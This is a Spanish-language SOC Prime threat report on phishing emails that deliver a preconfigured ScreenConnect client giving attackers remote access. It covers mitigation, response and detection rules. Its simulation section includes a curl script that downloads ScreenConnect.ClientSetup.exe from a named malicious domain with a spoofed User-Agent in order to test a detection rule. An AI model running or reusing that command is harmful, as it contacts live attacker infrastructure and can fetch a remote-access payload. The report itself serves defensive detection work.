SOC Prime Bias: Medium

05 Oct 2026 17:02 UTC

El cliente de ScreenConnect se utiliza indebidamente para habilitar el acceso remoto no autorizado

Author Photo
SOC Prime Team linkedin icon Seguir
El cliente de ScreenConnect se utiliza indebidamente para habilitar el acceso remoto no autorizado
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Resumen

Los atacantes están utilizando correos electrónicos de phishing para distribuir un cliente ScreenConnect legítimo y preconfigurado. La herramienta de Monitoreo y Gestión Remota (RMM) establece una conexión de retorno a una instancia controlada por el atacante, proporcionando acceso remoto a los sistemas comprometidos. La campaña abusa de la naturaleza confiable del software legítimo para evadir controles de seguridad básicos y mecanismos de detección.

Investigación

El investigador examinó un correo electrónico de phishing que contenía un enlace que entregaba un archivo PE. El análisis confirmó que el archivo era un cliente ScreenConnect legítimo y firmado digitalmente. Sin embargo, su configuración incrustada había sido modificada para conectarse a una instancia de retransmisión específica y un ID de instancia controlado por el actor de la amenaza.

Mitigación

Los navegadores pueden bloquear descargas de archivos ejecutables como una capa inicial de protección. Las organizaciones deben monitorear el uso no autorizado de herramientas RMM y aplicar controles estrictos sobre los ejecutables descargados de enlaces web no confiables. La lista blanca de aplicaciones también puede ayudar a prevenir la ejecución de clientes ScreenConnect no autorizados y otro software RMM no aprobado.

Respuesta

Cuando se detecta actividad maliciosa, aísla el endpoint afectado para evitar el acceso remoto continuado por parte del atacante. Identifica y termina cualquier proceso activo de ScreenConnect. Realiza una revisión forense de la configuración del cliente para identificar la infraestructura de mando y control del atacante y determinar el alcance del acceso no autorizado al sistema comprometido.

Flujo de Ataque

Todavía estamos actualizando esta parte.

Detecciones

Software de Acceso Remoto Alternativo / Gestión (vía creación_de_procesos)

Equipo de SOC Prime
05 Oct 2026

Posible Actividad de Comando y Control mediante Intento de Comunicación de Dominio de Software de Acceso Remoto (vía dns)

Equipo de SOC Prime
05 Oct 2026

Distribución de Malware Cliente ScreenConnect vía Correo Electrónico de Phishing [Proxy HTTP]

Reglas de AI de SOC Prime
05 Oct 2026

Ejecución de Simulación

  • Narrativa del Ataque y Comandos: El adversario pretende establecer persistencia en una estación de trabajo objetivo distribuyendo ScreenConnect a través de una campaña de phishing. En esta simulación, replicamos la etapa final: la máquina de la víctima realiza una solicitud HTTP saliente a un dominio comprometido/malicioso para descargar el ejecutable de configuración. Para imitar el comportamiento específico identificado en la inteligencia de amenazas, el «atacante» usa una cadena User-Agent personalizada ScreenConnect mientras solicita la ruta de archivo específica thelittlecupandsaucer.com.au/ScreenConnect.ClientSetup.exe. Esto activará la regla de detección basada en proxy.

  • Script de Prueba de Regresión:

    # Este script usa curl para imitar la solicitud de descarga maliciosa identificada en la regla de detección.
    # Usa la URL específica y el User-Agent específico requeridos para activar la alerta.
    
    TARGET_URL="http://thelittlecupandsaucer.com.au/ScreenConnect.ClientSetup.exe"
    MALICIOUS_UA="ScreenConnect"
    
    echo "[*] Simulando intento de descarga de ScreenConnect..."
    echo "[*] URL: $TARGET_URL"
    echo "[*] User-Agent: $MALICIOUS_UA"
    
    # Usamos -k para ignorar errores de SSL si el dominio simulado usa un cert auto-firmado, 
    # y -A para establecer el User-Agent específico.
    curl -k -A "$MALICIOUS_UA" "$TARGET_URL" -o /dev/null
    
    echo "[*] Comando de simulación enviado."
  • Comandos de Limpieza:

    # No se descargaron archivos al host en la simulación (redirigidos a /dev/null).
    # No se realizaron cambios en el sistema.
    echo "[*] Limpieza completa. Sin rastros en el host."